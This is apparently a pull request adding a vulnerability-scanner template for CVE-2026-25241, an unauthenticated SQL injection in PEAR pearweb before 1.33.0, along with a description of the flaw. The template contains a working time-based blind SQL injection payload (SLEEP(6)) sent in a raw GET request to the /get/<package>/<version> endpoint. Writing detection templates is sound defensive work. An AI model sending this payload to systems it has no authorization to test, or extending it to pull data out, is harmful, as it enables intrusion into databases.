### PR TITLE
Add CVE-2026-25241 - PEAR pearweb Unauthenticated SQL Injection

### DIFF
--- a/http/cves/2026/CVE-2026-25241.yaml
+++ b/http/cves/2026/CVE-2026-25241.yaml
@@ -1,0 +1,44 @@
+id: CVE-2026-25241
+
+info:
+  name: PEAR pearweb < 1.33.0 - Unauthenticated SQL Injection
+  author: bswearingen
+  severity: critical
+  description: |
+    PEAR is a framework and distribution system for reusable PHP components. Prior to version 1.33.0, an unauthenticated SQL injection in the /get/<package>/<version> endpoint allows remote attackers to execute arbitrary SQL via a crafted package version. This issue has been patched in version 1.33.0.
+  impact: |
+    Successful exploitation allows an unauthenticated attacker to extract sensitive data from the database or potentially achieve remote code execution.
+  remediation: |
+    Upgrade PEAR pearweb to version 1.33.0 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-25241
+    - https://github.com/pear/pearweb
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-25241
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+    vendor: pear
+    product: pearweb
+  tags: cve,cve2026,pear,pearweb,sqli,unauth
+
+http:
+  - raw:
+      - |
+        GET /get/test/1.0.0'%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(6)))a)--%20- HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=6'
+
+      - type: status
+        status:
+          - 200
+          - 404
+          - 500
+        condition: or


### PR DESCRIPTION
### Template Overview

This template detects CVE-2026-25241, an unauthenticated SQL injection vulnerability in PEAR pearweb versions prior to 1.33.0.

### Vulnerability Details

**Product:** PEAR pearweb
**Affected Versions:** < 1.33.0
**Severity:** Critical (CVSS 9.8)
**CWE:** CWE-89 (SQL Injection)

The `/get/<package>/<version>` endpoint does not properly sanitize the version parameter before including it in a SQL query. This allows remote, unauthenticated attackers to inject arbitrary SQL statements and potentially extract or modify database contents.

### Detection Method

The template uses a time-based blind SQL injection technique, injecting a `SLEEP(6)` payload into the version parameter and measuring response delay to confirm the vulnerability without causing harm to the target.

### References

- https://nvd.nist.gov/vuln/detail/CVE-2026-25241
- https://github.com/pear/pearweb